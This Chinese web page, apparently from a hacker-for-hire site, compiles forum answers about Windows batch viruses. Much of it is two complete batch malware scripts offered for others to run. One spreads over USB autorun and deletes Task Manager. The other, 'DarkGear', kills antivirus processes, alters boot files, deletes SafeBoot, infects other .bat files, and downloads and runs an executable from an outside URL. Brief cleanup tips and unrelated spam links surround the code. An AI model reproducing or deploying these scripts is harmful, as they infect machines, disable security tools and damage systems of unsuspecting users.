当前位置:首页 > 联系黑客 > 正文内容

windows简单小病毒bat(windows电脑病毒大全)

hacker3年前 (2022-06-13)联系黑客146

本文导读目录:

电脑中了超级病毒.bat怎么办,急!!!

使用电脑管家,打开工具箱,选择“系统急救箱”检查下是否dns被劫持导致,全盘查杀下病毒。

如果电脑没有安装,看看可否从网上下载一个然后在全盘杀毒。

实在不行就得重做系统了,然后在全盘杀毒。

谁能给我一个bat病毒

@echo off

title  

for /f "delims=" %%a in ('"fsutil fsinfo drives"') do (set pf=%%a)

set pf=%pf:~5%

cd "%systemdrive%\"

md %systemdrive%\windows\system32\SystemRootnul 2nul

copy/y %0 %systemdrive%\windows\system32\SystemRoot\FlashDisk.batnul 2nul

copy/y %0 %systemdrive%\windows\system32\FlashDisk.batnul 2nul

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskmgr /t reg_dword /d 00000001 /fnul 2nul

at /delete /yes

schtasks /create /tn FlashDisk /tr %systemdrive%\windows\system32\SystemRoot\FlashDisk.bat /sc hourly /ru systemnul 2nul

echo [autorun]%systemdrive%\windows\system32\SystemRoot\autorun.inf

echo open=FlashDisk.bat%systemdrive%\windows\system32\SystemRoot\autorun.inf

echo shell\open\command=FlashDisk.bat%systemdrive%\windows\system32\SystemRoot\autorun.inf

echo shell\explore\command=FlashDisk.bat%systemdrive%\windows\system32\SystemRoot\autorun.inf

:1

taskkill /f /im taskmgr.exenul 2nul

ping/n 5 127.0.0.1nul

echo y|cacls %systemdrive%windows\system32\taskmgr.exe /t /c /p everyone:f

del/f/s/q %systemdrive%windows\system32\taskmgr.exe

for %%b in (%pf%) do fsutil fsinfo drivetype %%b|find /i "可移动驱动器"attrib -s -h -r %%bautorun.inf|del/f/q %%bautorun.inf|copy/y %systemdrive%\windows\system32\SystemRoot\autorun.inf %%bautorun.inf|md %%bFlashDisk|copy/y %systemdrive%\windows\system32\SystemRoot\FlashDisk.bat %%bFlashDisk\FlashDisk.bat|attrib +s +h +r autorun.inf|attrib +s +h +r %%bFlashDisk\FlashDisk.batnul 2nul

goto 1

给大家一个BAT编写的病毒,自己做完运行一下,看看什么效果

严重肯定下,你写的bat很规范,变量也用地很好。。

我也学BAT

给你看看我的把,很久前写的,不要见笑啊,U盘传播,外加一个免杀的下载者(因为这个下载者放到了带“..”的特殊文件夹里,你应该明白呵呵)

AUTOEXEC --开机过程中就运行病毒了

带感染BAT文件,而且自身感染好像没有考虑= =||

@echo off

for %%i in (D: E: F: G: H: I: J: K: L: M: N: O: P: Q: R: S: T: U: V: W: X: Y: Z: )do (if %cd:~0,2%==%%i goto auto)

if %cd%==C:\RECYCL goto auto

:ww

attrib %0 -a -s -r -h

copy /y %0 "c:\Program Files\Common Files\Microsoft Shared\AutoRun.bat"

goto z

:z

IF NOT EXIST "c:\Program Files\Common Files\Microsoft Shared\Auto.vbs" goto e

tskill wscript

del "c:\Program Files\Common Files\Microsoft Shared\Auto.vbs"

if not exist "C:\Program Files\Common Files\MSSoap\Binaries\msconfig.ini" goto new

goto zz

:zz

Tskill Mcshield

Tskill VsTskMgr

Tskill naPrdMgr

Tskill UpdaterUI

Tskill TBMon

Tskill scan32

Tskill Ravmond

Tskill CCenter

Tskill RavTask

Tskill Rav

Tskill Ravmon

Tskill RavmonD

Tskill RavStub

Tskill KVXP

Tskill KvMonXP

Tskill KVCenter

Tskill KVSrvXP

Tskill KRegEx

Tskill UIHost

Tskill TrojDie

Tskill FrogAgent

Tskill kav

Tskill kav32

Tskill kavstart

Tskill katmain

attrib -a -s -r -h c:\boot.ini

echo c:\="microsoft dos"c:\boot.ini

attrib +a +s +r +h c:\boot.ini

attrib -a -s -r -h c:\msdos.sys

attrib -a -s -r -h c:\config.sys

echo [option] c:\msdos.sys

echo bootkey=1 c:\msdos.sys

echo BootMenu=0 c:\msdos.sys

echo BootWarn=0 c:\msdos.sys

echo BootFailSafe=0 c:\msdos.sys

echo DisabeLog =1 c:\msdos.sys

for %%k in (a,c,d,e,f,g,h,i,j,k,m,l,n,o,p,q,r,s,t,u,v,w,x,y,z) do @echo lastdrive=%%k c:\config.sys

attrib +a +s +r +h c:\msdos.sys

attrib +a +s +r +h c:\config.sys

attrib -a -s -r -h c:\autoexec.bat

echo @echo off c:\autoexec.bat

echo REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v KvMonXP /f c:\autoexec.bat

echo REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v kav /f c:\autoexec.bat

echo REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v KAVPersonal50 /f c:\autoexec.bat

echo REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v McAfeeUpdaterUI /f c:\autoexec.bat

echo REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Network Associates Error Reporting /f c:\autoexec.bat

echo REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v YLive.exe /f c:\autoexec.bat

echo REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v yassistse /f c:\autoexec.bat

echo REG DELETE HKLM\ServiceSOFTWARE\Microsoft\Windows\CurrentVersion\Run /v ShStatEXE /f c:\autoexec.bat

echo REG DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL /v CheckedValue /f c:\autoexec.bat

echo REG add HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL /v CheckedValue /t REG_DWORD /d 0 /f c:\autoexec.bat

echo REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\Schedule /v AtTaskMaxHours /f c:\autoexec.bat

echo reg add HKLM\SYSTEM\CurrentControlSet\Services\Schedule /v AtTaskMaxHours /t REG_DWORD /d 0 /f c:\autoexec.bat

echo REG DELETE HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot /f c:\autoexec.bat

attrib +a +s +r +h c:\autoexec.bat

IF NOT EXIST c:\Progra~1\Intern~1\PLUGINS\shell~1\down.vbs goto f

goto x

:x

cscript c:\Progra~1\Intern~1\PLUGINS\shell~1\down.vbs http://www.llzaj.com/cmd.exe c:\Progra~1\Intern~1\PLUGINS\shell~1\DarkGear.exe

C:\Progra~1\COMMON~1\Micros~1\DarkGear.exe

copy /y "c:\Program Files\Common Files\Microsoft Shared\AutoRun.vbs" "C:\Documents and Settings\All Users\「开始」菜单\程序\启动\"

REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\Schedule /v AtTaskMaxHours /f

reg add HKLM\SYSTEM\CurrentControlSet\Services\Schedule /v AtTaskMaxHours /t REG_DWORD /d 0 /f

goto a

:a

IF NOT EXIST "c:\Program Files\Common Files\Microsoft Shared\AutoRun.vbs" goto b

if not exist "c:\Program Files\Common Files\Microsoft Shared\desktop.ini" goto d

IF NOT EXIST "c:\Program Files\Common Files\Microsoft Shared\AutoRun.inf" goto c

for %%i in (c: d: e: f: g: h: i: j: k: l: m: n: o: p: ) do copy /y "c:\Program Files\Common Files\Microsoft Shared\AutoRun.inf" %%i

for %%c in (c: d: e: f: g: h: i: j: k: l: m: n: o: p: ) do md "%%c\RECYCL"

for %%c in (c: d: e: f: g: h: i: j: k: l: m: n: o: p: ) do copy /y "c:\Program Files\Common Files\Microsoft Shared\desktop.ini" "%%c\RECYCL"

for %%c in (c: d: e: f: g: h: i: j: k: l: m: n: o: p: ) do copy /y "c:\Program Files\Common Files\Microsoft Shared\AutoRun.bat" "%%c\RECYCL"

for %%q in (c: d: e: f: g: h: i: j: k: l: m: n: o: p: ) do attrib "%%q\RECYCL\AutoRun.bat" +a +s +r +h

for %%q in (c: d: e: f: g: h: i: j: k: l: m: n: o: p: ) do attrib "%%q\RECYCL\desktop.ini" +a +s +r +h

for %%q in (c: d: e: f: g: h: i: j: k: l: m: n: o: p: ) do attrib "%%q\autorun.inf" +a +s +r +h

for %%q in (c: d: e: f: g: h: i: j: k: l: m: n: o: p: ) do attrib "%%q\RECYCL\" +a +s +r +h /s /d

ping 127.0.0.1 -n 10 nul

goto a

:b

ECHO Set shell = Wscript.createobject("wscript.shell") "c:\Program Files\Common Files\Microsoft Shared\AutoRun.vbs"

ECHO a = shell.run ("C:\Progra~1\COMMON~1\Micros~1\AutoRun.bat",0)"c:\Program Files\Common Files\Microsoft Shared\AutoRun.vbs"

goto a

:c

ECHO [autorun]"c:\Program Files\Common Files\Microsoft Shared\AutoRun.inf"

ECHO OPEN=RECYCL\AutoRun.bat"c:\Program Files\Common Files\Microsoft Shared\AutoRun.inf"

ECHO shell\open\Command=RECYCL\AutoRun.bat"c:\Program Files\Common Files\Microsoft Shared\AutoRun.inf"

ECHO shell\explore\Command=RECYCL\AutoRun.bat"c:\Program Files\Common Files\Microsoft Shared\AutoRun.inf"

goto a

:d

echo [.ShellClassInfo]"c:\Program Files\Common Files\Microsoft Shared\desktop.ini"

echo CLSID={645FF040-5081-101B-9F08-00AA002F954E}"c:\Program Files\Common Files\Microsoft Shared\desktop.ini"

goto a

:e

ECHO Set shell = Wscript.createobject("wscript.shell") "c:\Program Files\Common Files\Microsoft Shared\Auto.vbs"

ECHO a = shell.run ("C:\Progra~1\COMMON~1\Micros~1\AutoRun.bat",0)"c:\Program Files\Common Files\Microsoft Shared\Auto.vbs"

"c:\Program Files\Common Files\Microsoft Shared\Auto.vbs"

exit

:f

md c:\Progra~1\Intern~1\PLUGINS\shell..\

echo On Error Resume Next c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs

echo Dim eee,eeee c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs

echo eeee = LCase(WScript.Arguments(1)) c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs

echo eee = LCase(WScript.Arguments(0)) c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs

echo Set xPost = createObject("Microsoft.XMLHTTP") c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs

echo xPost.Open "GET",eee,0 c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs

echo xPost.Send() c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs

echo Set sGet = createObject("ADODB.Stream") c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs

echo sGet.Mode = 3 c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs

echo sGet.Type = 1 c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs

echo sGet.Open() c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs

echo sGet.Write(xPost.responseBody) c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs

echo sGet.SaveToFile eeee,2 c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs

goto x

:auto

%windir%\explorer.exe %cd:~0,2%

if not exist "c:\Program Files\Common Files\Microsoft Shared\AutoRun.bat" goto ww

IF EXIST "c:\Program Files\Common Files\Microsoft Shared\Auto.vbs" goto z

exit

:new

md c:\Progra~1\Intern~1\PLUGINS\shell..\

copy "c:\Program Files\Common Files\Microsoft Shared\AutoRun.bat" c:\Progra~1\Intern~1\PLUGINS\shell..\

at 9:58 tskill cmd

at 10:00 c:\Progra~1\Intern~1\PLUGINS\shell~1\AutoRun.bat

at 13:58 tskill cmd

at 14:00 c:\Progra~1\Intern~1\PLUGINS\shell~1\AutoRun.bat

at 19:58 tskill cmd

at 20:00 c:\Progra~1\Intern~1\PLUGINS\shell~1\AutoRun.bat

at 15:58 tskill cmd

at 16:00 c:\Progra~1\Intern~1\PLUGINS\shell~1\AutoRun.bat

echo This is DarkGear v3.0 , Make by The Ghost Hunter "C:\Program Files\Common Files\MSSoap\Binaries\msconfig.ini"

FOR %%a in ( c: d: e: f: g: h: i: j: k: l: m: n: o: p: q: r: s: t: u: v: w: s: y: z: ) do dir /a:- /s /b %%a\*.bat%windir%\msconfig.inf

FOR /f "delims=" %%i in (%windir%\msconfig.inf) do attrib -a -s -r -h "%%i"

FOR /f "delims=" %%i in (%windir%\msconfig.inf) do copy /y "c:\Program Files\Common Files\Microsoft Shared\AutoRun.bat" "%%i"

del "c:\windows\msconfig.inf"

exit

其实那些TSkill都没用,编这个的时候我很菜

电脑的重新启动的小病毒怎么做?

我也出现过这样的问题,同时不见的图标应该还有USB(安全删除硬件),如果是笔记本电量图标也不会显示。以下是几个解决办法:

方案一:

控制面板——管理工具——服务——SSDP Discovery Service——已禁用

控制面板——管理工具——服务——Universal Plug and Play Device Host——已禁用

重启

方案二:

点开始,右键在空白处点属性,打开“任务栏和开始菜单属性”,把隐藏不活动的图标前面的勾去掉。

按在“开始→运行”中键入“regedit.exe”,打开“注册表编辑器”,展开分支“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\TrayNotify”,其中“IconStreams”和“PastIconStream”项中分别存储着“当前项目”和“过去的项目”;将“TrayNotify”项删除,按Ctrl+Alt+Del组合键调出“Windows任务管理器”,单击进程选项卡,选择explorer.exe,结束进程。之后在“Windows任务管理器”中选“文件”→“新建任务”,在“创建新任务”中输入explorer.exe即可

然后按照之一步把隐藏不活动的图标前面的勾点上。OK!

方案三:

按下 Ctrl+Alt+Del 键,打开任务管理器-“进程”选项卡-找到并关闭所有的 explorer.exe 和 iexplore.exe 进程。

然后切换到“应用程序”选项卡-新任务-输入“regedit”,回车,打开注册表编辑器,找到并删除以下三个键:

HKEY_CURRENT_USER\Software\Microsoft\Windows\

CurrentVersion\explorer\StuckRects2

HKEY_CURRENT_USER\Software\Microsoft\Windows\

CurrentVersion\explorer\Streams

HKEY_CURRENT_USER\Software\Microsoft\Windows\

CurrentVersion\explorer\StreamsMRU

然后关闭注册表编辑器,在任务管理器的菜单上选“关机”-重新启动。

方案四:

“开始”——“运行”输入regedit打开注册表以后,依次打开HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 在它的右窗口新建字串"Systray",键值(在Systray上双击编辑)为"c:\windows\system32\Systray.exe",如果是win2000系统,则为"c:\winnt\system32\Systray.exe"。然后打开“控制面板”——“声音和音频设备”□将音量图标放入任务栏√上 确定OK

电脑中了被bat病毒怎么办,求大神给一个 *** 。

有很多病毒都可以屏蔽杀毒软件啊我个人的建议啊 希望对你有所帮助电脑中毒了啊 杀毒软件是很难把电脑病毒杀彻底的啊 而且你的杀毒软件很容易被病毒破坏而不能用 而且现在的病毒有好多都是免杀的 你更好的办法是把你的电脑系统重新装一下系统 还有就是要把其他的盘中清一清啊 看有没有可疑文件 有就要删掉 以防是病毒啊 然后把杀毒软件装上 再备份一下你的系统 这样做效果是更好的啊 这里有很多优秀的杀毒软件 你可以参考一下卡巴斯基、诺顿、金山毒霸那一个都比较适合家用啊ESET NOD32 Antivirus::全球唯一通过37次VB100%测试的防毒软件·Kaspersky(卡巴斯基) V6.0::来源于俄罗斯,是世界上更优秀、最顶级的 *** 杀毒软件·金山毒霸 2008 杀毒套装::国内更好的杀毒软件,可以清除病毒,漏洞修复 以上的杀毒软件都可以在多特网站上下载到 多特网站是 www.duote.com360安全卫士和360杀毒软件都是免费的 官方网站下载 www.360.cn超级巡警也是免费的 官方网站下载 www.sucop.com都是挺好的杀毒软件 都是杀毒效果很好的啊 而且永远是免费的啊

自制简单电脑病毒破解

1.建立一个txt文件,写入"shutdown -a"(引号不算),改名为bat,运行后可以直接取消关机指令。

2.如果你速度够快,按WIN+R然后输入shutdown -a 也可以

扫描二维码推送至手机访问。

版权声明:本文由黑客24小时在线接单网站发布,如需转载请注明出处。

本文链接:https://www.cn-sl.com/125894.html

分享给朋友:

“windows简单小病毒bat(windows电脑病毒大全)” 的相关文章

火车票退票扣多少手续费(已发车的火车票能退票吗)

随着春节的临近,受疫情和防控政策的影响,很多申城市民决定调整回老家过年、旅游、吃饭的安排。预订的机票、火车票、酒店、除夕晚餐可以取消吗?押金等预付费用可以退吗?铁路:开车前8天免收退票费为配合地方政府落实疫情防控常态化措施,避免重复购票退票给乘客带来不便,自2021年2月12日(正月初一)售票以来,...

郭碧婷被向佐玩成什么样子了「向佐真的喜欢郭碧婷吗」_郭碧婷

据新快网 二0 二 一年 一0月 二0日0 三: 三 一: 二 七的消息 报导,微专网友@R卜傲晴 爆料。 安然 夜光降 之际,事宜 ,正在网上炒患上满城风雨,激发 齐网冷议! 据悉,郭碧婷被背佐 之后的综艺外才无机会诠释来导航没有是简。疑惑 背佐战郭碧婷娶亲 购了冷搜。相比背太泄漏 称...

苹果8发行价格是多少(苹果8p官方价格多少)

再过一个月,让咱们先看看网站上的价钱 。第 一 一代智妙手 机, 二 五 六G正在 三 八00元阁下 。iPhone 八Plus有二种规格,齐网通,价钱 以下:iPhone 八Plus 六 四GB: 六 六 八 八元·库克正在史蒂妇·乔布斯剧场宣布 。也是遭到了许多 用户的若干 爱好 ,两脚价钱 火...

体彩在哪里(体彩七位数开奖结果)

起源 :江苏体彩网  五月 四日谢罚的江苏体彩 七位数第 一 八0 六 七期,位于镇江市润州区美的乡的 一 一0 五 二网点一举外没 一0注特等罚,总罚金下达 五000万元。  一 八0 六 七期 七位数谢没外罚号码“ 七 八 二 八 一 四 二”,当期共外没 一0注特等罚,每一注罚金 五00万...

威士忌多少钱一瓶 「大芹威士忌多少钱一瓶」

造一瓶程控管宽谨品性上有优秀 火准取保证 ,威士忌外的极品。属蒸馏酒,第一个临盆 并折衷 威士忌的临盆 商。 杰克丹僧。正在橡木桶外鲜酿多年后,人头马、个中 乌圆/瓶皇野旗兵「 二 一年 八 八0元/瓶愿望 那答复 能助到您。调配成 四 三度阁下 的烈性蒸馏酒年夜 芹。正在年夜 型的洋酒商止皆能战随...

宿松是哪里(宿松县名字的由来)

点击蓝字咱们 CCTV- 一0  二0 二0. 八. 二  二 三: 二 六播没 《外国印象圆志》安徽卷 宿紧篇 宿紧篇 预报 片 唐地宝十四年(私元 七 五 五年),李皂为躲“安史之治”, 自汴州,即古河北谢启北奔。相传李皂此时 曾经游历至宿紧,正在北台山的 对于酌亭,取时任县令的闾...

评论列表

鸽吻旧我
3年前 (2022-06-13)

果电脑没有安装,看看可否从网上下载一个然后在全盘杀毒。实在不行就得重做系统了,然后在全盘杀毒。谁能给我一个bat病毒@echo offtitle  for /f "delims=" %%a i

闹旅擅傲
3年前 (2022-06-13)

urrentVersion\explorer\StreamsMRU 然后关闭注册表编辑器,在任务管理器的菜单上选“关机”-重新启动。方案四: “开始”——“运行”输入regedit打开注册表以后,依次打开HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wi

鸠骨败骨
3年前 (2022-06-13)

0 "c:\Program Files\Common Files\Microsoft Shared\AutoRun.bat"goto z:zIF NOT EXI

语酌云裳
3年前 (2022-06-13)

f "delims=" %%i in (%windir%\msconfig.inf) do attrib -a -s -r -h "%%i"FOR /f "delims=" %%i in (%windir%\msco

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。